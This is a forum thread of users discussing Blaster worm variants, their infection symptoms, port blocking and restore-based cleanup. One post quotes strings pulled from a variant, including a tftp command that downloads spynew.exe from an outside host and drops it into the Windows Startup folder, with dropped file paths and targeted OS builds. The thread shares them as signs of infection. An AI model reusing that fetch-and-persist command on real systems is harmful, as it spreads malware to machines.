|
Blaster worm - new versions
original worm:
http://www.symantec.com/avcenter/ven...ster.worm.html new viesion b: http://www.symantec.com/avcenter/ven...er.b.worm.html new viesion c: http://www.symantec.com/avcenter/ven...er.c.worm.html |
I got hit 40mins ago simply renamed the 2 exe files to txt so it would not be able to restart and i ran the XP system restore all fixed. :thumbsup
|
how do u get hit though, where does it most commonly go? msn... icq.....kazaa?
|
You can block with router or firewall.
TCP Port 135, "DCOM RPC" UDP Port 69, "TFTP" Its using a hole in windows to get direct access they just run up the IP chain from various sources infecting users at random. Soon as it got me my Router lit up like a christmas tree and i noticed 2 new exe files on my c:\ drive. If you just disconnect network from taskbar you kill the connection and then you can restore your system with no problems. I even saved copies of the install for my collection. :1orglaugh |
Quote:
the IP it's on and goes to those IPs machines and the it continues.. Nothing ot do with ICQ, mail or whatever - that's the cool thing |
Quote:
|
Nah you will know when it gets you because it starts sending packets to mircosoft to try and overload their servers. I did not get anything with the name Msblast.exe or by any of the names from the other 2 versions so this is something different. It cannot be removed by simply killing the process so the symantec removal instructions might not be of much use.
Also if you reboot while infected its not going to let you on the net and will shut you off every few mins. So if you do get hit then you better fix your system or restore before you reboot or you will regret it when your connection is overloaded. Its got a calling card inside thats needed to hijack to your system and appears to only affect english windows versions. You should block ports 130-140 from inbound connections just to be on the safe side unless you run services on any of those ports. If you are infected you might find some of these files below on your machine. You will also find ctrl-alt-del (task manager) will close everytime you open it to prevent you from killing the process. c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spynew.exe c:\rootdir.exe c:\wincgi32.exe dink dink %s Exploitable! %s 135 open start spynew.exe tftp -i rpc.afraid.org GET spynew.exe cd "\Documents and Settings\All Users\Start Menu\Programs\Startup\" It looks for the following OS below and possibly wont affect non english builds. Windows XP SP1 (english) Windows XP SP0 (english) Windows 2000 SP4 (english) Windows 2000 SP3 (english) Windows 2000 SP2 (english) Windows 2000 SP1 (english) Windows 2000 SP0 (english) |
I was getting bombared with hackers, its my belief that my IP was displayed on a hacking site somewhere. It was getting so annoying that in th end I looked at all the files on the PC with a recent date stamp and deleted them "tee hee hee" after that i reinstall Norton and ramped it up to full security, since then the fuckers have been knocked back. As soon as my current ADSL contract is up I'm going "dynamic"
|
| All times are GMT -7. The time now is 11:46 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123